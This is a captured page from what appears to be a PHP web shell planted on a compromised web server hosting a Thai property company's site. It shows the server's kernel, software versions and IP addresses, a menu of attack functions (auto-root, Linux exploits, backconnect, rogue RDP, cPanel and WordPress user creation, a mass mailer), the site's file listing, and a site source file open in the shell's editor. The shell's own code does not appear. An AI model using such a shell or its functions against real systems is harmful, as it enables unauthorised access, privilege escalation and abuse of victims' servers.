Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 52.15.170.67
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
mewika.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets-new
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
6.88
KB
-rw-r--r--
2HeadMenu.php
11.58
KB
-rw-r--r--
3Footer.php
6.72
KB
-rw-r--r--
4End.php
581
B
-rw-r--r--
BannerCoverAll.php
1.83
KB
-rw-r--r--
aboutus.php
2.18
KB
-rw-r--r--
contact-us.php
2.49
KB
-rw-r--r--
content.php
4.77
KB
-rw-r--r--
detail.php
699
B
-rw-r--r--
detail_RecommendedProjects.php
5.09
KB
-rw-r--r--
detail_about.php
1.8
KB
-rw-r--r--
detail_banner.php
3.66
KB
-rw-r--r--
detail_consult.php
2.43
KB
-rw-r--r--
detail_news.php
5.29
KB
-rw-r--r--
detail_ourteam.php
2.96
KB
-rw-r--r--
detail_product.php
9.33
KB
-rw-r--r--
index.php
156
B
-rwxr-xr-x
news.php
3.68
KB
-rw-r--r--
our-services.php
3.84
KB
-rw-r--r--
package.json
14.21
KB
-rw-r--r--
product-detail.php
7.41
KB
-rw-r--r--
project-detail.php
17.72
KB
-rw-r--r--
project.php
3.68
KB
-rw-r--r--
properties.php
17.79
KB
-rw-r--r--
properties_detail.php
2.16
KB
-rw-r--r--
search.php
9.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detail_news.php
<div id='qx-section-12179' class='qx-section'> <div class="qx-container"> <div class="qx-rows"> <div id='qx-row-32182' class='qx-row-wrap'> <div class='qx-row'> <div id="qx-column-85183" class="qx-column"> <div class="qx-col-wrap"> <div class="qx-elements-wrap"> <div class="qx-element-wrap"> <div id="qx-heading-21187" class="qx-element qx-element-heading-v2" qx-scrollspy="cls:qx-animation-slide-top-medium;repeat:ture;"> <h3> <span> ข่าวสารและกิจกรรม </span> </h3> </div> </div> <div class="qx-element-wrap"> <div id="qx-joomla-articles-15224" class="qx-element qx-element-joomla-articles-v2" qx-scrollspy="cls:qx-animation-slide-top-medium;repeat:ture;"> <div class="qx-card-deck"> <?PHP $CategoryContent_ID = 55; $CategoryContentLanguage_ID = 112; $SQL_content = " SELECT content.Content_ID, content.CategoryContent_ID, category_content.CategoryContent_Name, content.CategoryContentLanguage_ID, category_content_language.CategoryContentLanguage_NameTH, category_content_language.CategoryContentLanguage_NameEN, category_content_language.CategoryContentLanguage_IMG, content.StatusContent_ID, status_content.StatusContent_Name, content.Member_ID, member.Member_PrefixNameEN, member.Member_NameEN, content.Content_Name, content.Content_Content1, content.Content_Content2, content.Content_Content3, content.Content_Content4, content.Content_Content5, content.Content_Sort, content.Content_Date, content.Content_Time, content.Content_Number, content.Content_Visitors, member.Position_ID, position.Position_Name FROM position INNER JOIN (member INNER JOIN (status_content INNER JOIN ((content INNER JOIN category_content ON content.CategoryContent_ID = category_content.CategoryContent_ID) INNER JOIN category_content_language ON content.CategoryContentLanguage_ID = category_content_language.CategoryContentLanguage_ID) ON status_content.StatusContent_ID = content.StatusContent_ID) ON member.Member_ID = content.Member_ID) ON position.Position_ID = member.Position_ID WHERE content.CategoryContentLanguage_ID = $CategoryContentLanguage_ID AND content.CategoryContent_ID = $CategoryContent_ID AND content.StatusContent_ID = 1 ORDER BY content.Content_ID asc LIMIT 4 "; $objQuery_content = $objConnect->query($SQL_content); while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; $ContentDate = date_create($ContentDate); $ContentDateFormat = date_format($ContentDate, "d/m/Y"); include 'Structure/Structure_Content_check.php'; $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID ORDER BY ContentImg_Sort ASC LIMIT 1 "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img); ?> <div class="qx-card"> <figure class="qx-card-img-top"> <div class="content-overlay"></div> <a class='' href="content.php?ID=<?= $ContentID; ?>"> <?PHP while ($objResult_Content_Img = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG_ContentImgName = $objResult_Content_Img["ContentImg_Name"]; ?> <img class="qx-media-object qx-img-responsive" src="model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>" data-src="model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>" data-qx-img /> <?PHP } ?> </a> </figure> <div class="qx-card-body fadeIn-bottom bg-index1"> <div class="height40" > <h3 class="qx-card-title qx-media-heading"> <a href="content.php?ID=<?= $ContentID; ?>"><?= $Check_ContentContent1; ?></a> </h3> <div class="qx-post-meta"> <span class="qx-element-jarticle-date"> <i class="qxif-calendar-alt"></i> <?= $ContentDateFormat; ?> </span> </div> <p class="qx-card-text qx-element-jarticle-introtext"> <?= $Check_ContentContent2; ?> </p> </div> <div class="qx-post-link" itemprop="url"> <a class='qx-btn qx-btn-primary qx-btn-sm' href="content.php?ID=<?= $ContentID; ?>">อ่านต่อ</a> </div> </div> </div> <?PHP } ?> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div>
Close